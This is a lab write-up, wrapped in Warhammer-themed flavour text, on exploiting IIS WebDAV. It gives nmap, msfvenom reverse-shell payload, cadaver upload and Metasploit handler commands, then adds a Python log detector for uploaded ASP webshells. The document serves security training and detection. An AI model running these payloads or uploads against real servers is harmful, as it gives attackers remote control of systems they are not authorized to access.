+++ INITIATING LITURGICAL BROADCAST +++

By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.


In this lab/module we will use Metasploit to exploit WebDAV, together with cadaver to upload the webshell.

So, as always, the first step is to scan. Since we are always provided with the “demo.ine.local” machine, I will scan that directly.

In this case, since I know that the machine must already be up for the lab, I will scan directly for WebDAV.

nmap -Pn -sV --script=http-enum -T4 demo.ine.local
 
# WebDav available 
 
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-enum: 
|_  /webdav/: Potentially interesting folder (401 Unauthorized)
 

In this case we also got the password for this WebDAV; otherwise we could try to brute-force it with Hydra, for example.

So I will log in to WebDAV at demo.ine.local/webdav/ and then use msfvenom to create a payload for this.

Since this is a lab I already did back then, I know asp files are executable; if not, we could use davtest to check which files we could execute.

Anyway, the command for msfvenom:

 
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f asp LHOST=IP LPORT=1234 > shell.asp
 

Then we must upload this using cadaver: connect with cadaver http://demo.ine.local/webdav/ and then run put shell.asp at the cadaver prompt.

After this we must set up a handler in msfconsole with multi/handler. We set everything from options, including the payload, to match the one we made with msfvenom.

Run the handler, and then execute the webshell from WebDAV. If everything worked, we will get access to the target with a meterpreter session.

Important

We can also use a Metasploit module to automate all of this, called iis_webdav_upload_asp.
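
From the defender's side, the manual sequence described above (a PUT of an .asp file into /webdav/ followed by a request for the same path) shows up in the IIS W3C logs. The following is an added example, not part of the original writeup: the log lines, user name, addresses and extension list are constructed assumptions.

```python
# Added example: find script files written over WebDAV and later requested.
# SAMPLE_LOG is constructed; columns follow whatever the "#Fields:" line declares.
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".ashx")  # assumption: adjust to mapped handlers

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip cs(User-Agent) sc-status
2024-01-01 10:00:01 PROPFIND /webdav/ - 10.0.0.5 cadaver 401
2024-01-01 10:00:05 PROPFIND /webdav/ labuser 10.0.0.5 cadaver 207
2024-01-01 10:00:09 PUT /webdav/shell.asp labuser 10.0.0.5 cadaver 201
2024-01-01 10:00:20 PUT /webdav/notes.txt labuser 10.0.0.5 cadaver 201
2024-01-01 10:00:31 GET /webdav/shell.asp labuser 10.0.0.5 Mozilla/5.0 200
2024-01-01 10:01:00 GET /webdav/notes.txt labuser 10.0.0.5 Mozilla/5.0 200
"""

def parse_w3c(text):
    """Yield one dict per request, keyed by the latest #Fields: directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or corrupt rows
                yield dict(zip(fields, values))

def find_uploaded_scripts(text):
    """Return one finding per script file created by a successful PUT."""
    uploads = {}  # lowercased path -> finding
    for r in parse_w3c(text):
        path = r["cs-uri-stem"].lower()
        status = int(r["sc-status"])
        if r["cs-method"] == "PUT" and path.endswith(SCRIPT_EXTS) and 200 <= status < 300:
            uploads[path] = {"path": path, "uploader": r["c-ip"],
                             "user": r["cs-username"],
                             "uploaded": f'{r["date"]} {r["time"]}',
                             "requested_by": []}
        elif r["cs-method"] in ("GET", "POST") and path in uploads:
            # Any later request for the uploaded script is worth triage.
            uploads[path]["requested_by"].append((r["c-ip"], status))
    return list(uploads.values())

if __name__ == "__main__":
    for finding in find_uploaded_scripts(SAMPLE_LOG):
        print(finding)
```

A finding with a non-empty requested_by list means the uploaded script was requested after the write, which is the point at which it would have run on the server.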


GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.

+++ LITURGICAL BROADCAST COMPLETE +++